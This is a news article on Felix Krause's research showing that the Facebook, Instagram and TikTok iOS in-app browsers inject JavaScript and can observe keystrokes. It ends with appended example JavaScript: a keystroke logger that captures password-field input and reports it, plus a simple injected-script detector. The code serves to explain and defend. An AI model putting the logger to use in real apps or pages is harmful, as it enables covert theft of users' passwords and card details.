The iPhone apps of Facebook, Instagram and TikTok are able to track what users do in their in-app browsers, a security researcher claims. Felix Krause, a security researcher and former Google engineer, has found that although the three social media apps say they don't track this data, the way their in-app browsers are built lets them capture everything a user types there, should they choose to.
“The iOS Instagram and Facebook app render all third party links and ads within their app using a custom in-app browser. This causes various risks for the user, with the host app being able to track every single interaction with external websites, from all form inputs like passwords and addresses, to every single tap,” Krause writes in a blog post.
The researcher explains that the Facebook and Instagram apps (both owned by Meta, formerly known as Facebook) open external links in an in-app browser that Meta controls, rather than in the browser of the user's choice such as Safari or Mozilla Firefox. On iOS this only works because the apps use their own custom web view (a WKWebView) instead of Safari or Apple's SFSafariViewController, which runs outside the host app's reach. Because the host app controls the web view, it can run its own code inside every page shown there and so observe every piece of text typed into it: passwords, addresses, purchase details and more.
The researcher further explains that Instagram and Facebook inject their own JavaScript code into every website shown, including pages opened by tapping an ad. Krause found no evidence that the injected script currently collects this data, but the capability to track in-app browser activity is there. “Even though the injected script doesn’t currently do this, running custom scripts on third party websites allows them to monitor all user interactions, like every button & link tapped, text selections, screenshots, as well as any form inputs, like passwords, addresses and credit card numbers.”
“TikTok iOS subscribes to every keystroke (text inputs) happening on third party websites rendered inside the TikTok app. This can include passwords, credit card information and other sensitive user data. We can’t know what TikTok uses the subscription for, but from a technical perspective, this is the equivalent of installing a keylogger on third party websites,” reads his blog post.
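The two mechanisms the article describes, a host app injecting JavaScript into every page (Meta's apps) and that script subscribing to every keystroke (TikTok), as an added example that is not code from Krause's post, from Meta or from TikTok. It assumes a WKWebView-style host, where the app can add a script to each page and receive data back through a native bridge (WKScriptMessageHandler); the `report` callback, the FakeNode mini-DOM with capture/bubble propagation, the page layout and the URL `https://example.test/app.js` are all constructed here so the code runs offline in Node. The second half shows a coarse check a site can run against injected `<script>` elements, which is a generic heuristic rather than anything the article attributes to Krause.

```javascript
// Added example, not code from Krause's post, Meta or TikTok. Constructed mini-DOM
// stand-in so the script-injection and keystroke-capture behaviour can run in Node.
class FakeNode {
  constructor(tagName, attrs = {}, parent = null) {
    this.tagName = tagName;
    Object.assign(this, attrs);
    this.parent = parent;
    this.children = [];
    this.listeners = [];
    if (parent) parent.children.push(this);
  }
  addEventListener(type, fn, useCapture = false) {
    const capture = typeof useCapture === 'object' ? !!useCapture.capture : !!useCapture;
    this.listeners.push({ type, fn, capture });
  }
  dispatchEvent(ev) {
    ev.target = this;
    const path = [];                                   // target ... root
    for (let n = this; n; n = n.parent) path.push(n);
    const run = (node, capture) => node.listeners
      .filter(l => l.type === ev.type && l.capture === capture)
      .forEach(l => l.fn(ev));
    for (const n of [...path].reverse()) run(n, true); // capture phase: root -> target
    for (const n of path) run(n, false);               // bubble phase: target -> root
  }
}

// (1) What the host app's injected script can do. One capturing listener on the
// document sees every keystroke and every input change anywhere on the page,
// including type="password" fields, before the page's own handlers run. `report`
// stands in for the native bridge (WKScriptMessageHandler) back to the app.
function installKeystrokeLogger(doc, report) {
  const captured = [];
  const onEvent = (ev) => {
    const t = ev.target;
    const entry = {
      event: ev.type,
      field: t.name || t.id || '(unnamed)',
      fieldType: t.type || 'unknown',
      key: ev.type === 'keydown' ? ev.key : null,
      value: ev.type === 'input' ? String(t.value ?? '') : null,
    };
    captured.push(entry);
    report(entry);
  };
  doc.addEventListener('keydown', onEvent, true);
  doc.addEventListener('input', onEvent, true);
  return captured;
}

// (2) Page-side check: list <script> elements the site did not ship itself.
// Heuristic only: it sees DOM side-effects, not listeners registered by the host app
// through the native bridge, and an injecting app could remove its tag afterwards.
function findForeignScripts(root, knownSources) {
  const known = new Set(knownSources);
  const foreign = [];
  const walk = (n) => {
    if (n.tagName === 'script' && !known.has(n.src || n.textContent || '')) foreign.push(n);
    n.children.forEach(walk);
  };
  walk(root);
  return foreign;
}

// Constructed scenario: a login page with one known script, rendered inside a host app
// that injects its own script tag and installs the logger (simulating a WKUserScript).
function simulateInAppLogin() {
  const doc = new FakeNode('document');
  const body = new FakeNode('body', {}, doc);
  new FakeNode('script', { src: 'https://example.test/app.js' }, body); // site's own, hypothetical URL
  const form = new FakeNode('form', {}, body);
  const pw = new FakeNode('input', { name: 'password', type: 'password', value: '' }, form);

  new FakeNode('script', { textContent: '/* injected by host app */' }, doc);
  const reported = [];
  const captured = installKeystrokeLogger(doc, (e) => reported.push(e));

  // User types "hunter2" into the password field: one keydown and one input event per character.
  for (const ch of 'hunter2') {
    pw.dispatchEvent({ type: 'keydown', key: ch });
    pw.value += ch;
    pw.dispatchEvent({ type: 'input' });
  }

  const foreign = findForeignScripts(doc, ['https://example.test/app.js']);
  return { reported, captured, foreign, finalValue: reported[reported.length - 1].value };
}
```

The point of the first half is that nothing on the third-party page can stop the injected script: it runs with the page's own privileges, so a field being `type="password"` or the site never sending the value anywhere makes no difference. The second half is the kind of check a site owner can run, but it only catches injection that leaves a trace in the DOM; the only robust fix is on the app side, opening links in Safari or SFSafariViewController where no host-app script can run.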